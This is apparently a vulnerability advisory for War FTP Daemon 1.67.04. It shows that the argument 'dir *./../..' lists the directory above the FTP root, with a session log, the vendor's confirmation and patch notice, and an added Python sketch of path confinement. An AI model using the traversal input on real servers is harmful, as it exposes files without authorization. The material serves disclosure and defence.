Overview:
By adding a specially formed argument to the dir command, it is possible to list the /../ directory, that is, the directory one level above the FTP root.

Detail:
The command is the following:

    dir *./../..

Log:

    Verbindung mit 10.17.3.44 wurde hergestellt.
    220- Jgaa's Fan Club FTP Service WAR-FTPD 1.67- 04 Ready
    220 Please enter your user name.
    Benutzer (10.17.3.44:(none)): anonymous
    331 User name okay. Give your full Email address as password.
    Kennwort:
    230 User logged in, proceed.
    ftp> dir
    200 Port command okay.
    150 Opening ASCII NO-PRINT mode data connection for ls -l.
    total 123
    drwxrwxrwx 1 ftp ftp 0 Mar 2 12:17 test
    -rwxrwxrwx 1 ftp ftp 6 Mar 2 12:33 movedtohomedir.txt
    -rwxrwxrwx 1 ftp ftp 11 Mar 2 00:29 bisontest.txt
    drwxrwxrwx 1 ftp ftp 0 Mar 3 15:59 HTTP
    drwxrwxrwx 1 ftp ftp 0 Mar 3 17:05 huhu
    drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 te
    drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 ..te
    226 Transfer finished successfully. Data connection closed.
    FTP: 452 Bytes empfangen in 0,02Sekunden 22,60KB/s
    ftp> cd ..
    550 Permission denied.
    ftp> dir *./../..
    200 Port command okay.
    150 Opening ASCII NO-PRINT mode data connection for ls *./../...
    total 123
    -rwxrwxrwx 1 ftp ftp 251658240 Mar 4 18:42 WIN386.SWP
    drwxrwxrwx 1 ftp ftp 0 Jan 6 20:32 games
    drwxrwxrwx 1 ftp ftp 0 Jan 7 19:58 HalfLife
    ....(cut here) ...
    drwxrwxrwx 1 ftp ftp 0 Jan 15 22:36 delphi_zips
    drwxrwxrwx 1 ftp ftp 0 Mar 4 15:00 web
    drwxrwxrwx 1 ftp ftp 0 Mar 4 21:36 WEBS
    226 Transfer finished successfully. Data connection closed.
    FTP: 2977 Bytes empfangen in 0,07Sekunden 42,53KB/s

The author has been contacted. Response (slightly edited by se0020):

    I can confirm that the problem is present in War FTP Daemon 1.67.04. After examining the problem, it _looks_ like the exploit is limited to listing the content one level up from the root-directory. I was unable to access any of the listed files or directories. I do however consider the problem as serious, and will release a fix within a few hours.

The patch has already been released: http://support.jgaa.com
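
The log shows `cd ..` being refused while `dir *./../..` is served. As an added example (not part of the original advisory and not War FTP Daemon's code), the sketch below shows one way a server can confine LIST and CWD arguments to the virtual root by resolving them component by component; the names `resolve_virtual`, `handle_list` and `PathEscape` are hypothetical, and the sample inputs are constructed apart from the argument taken from the log.

```python
class PathEscape(ValueError):
    """Client-supplied path would leave the virtual root."""


def resolve_virtual(cwd, arg):
    """Resolve a LIST/CWD argument against the virtual cwd ("/" = FTP root).

    Wildcard components such as "*." are kept as opaque names: each one is
    one level down, so a following ".." only cancels it and a second ".."
    is an attempt to climb above the root.
    """
    arg = arg.replace("\\", "/")  # treat both separators alike
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PathEscape(arg)
            parts.pop()
        elif comp.strip(". ") == "":
            # Dot/space-only names ("...", ".. "): refused rather than
            # guessing how the underlying filesystem interprets them.
            raise PathEscape(arg)
        else:
            parts.append(comp)
    return "/" + "/".join(parts)


def handle_list(cwd, arg):
    """Return the reply a server would send before opening the data channel."""
    try:
        return "150 " + resolve_virtual(cwd, arg)
    except PathEscape:
        return "550 Permission denied."


if __name__ == "__main__":
    # Constructed inputs; the third is the argument from the log above.
    for cwd, arg in [("/", "test"), ("/huhu", "../HTTP"), ("/", "*./../.."),
                     ("/", ".."), ("/", "*.\\..\\.."), ("/", "...")]:
        print(repr(arg), "->", handle_list(cwd, arg))
```

The same resolver has to sit in front of every command that takes a path, so that listing and directory changes cannot disagree about where the root is.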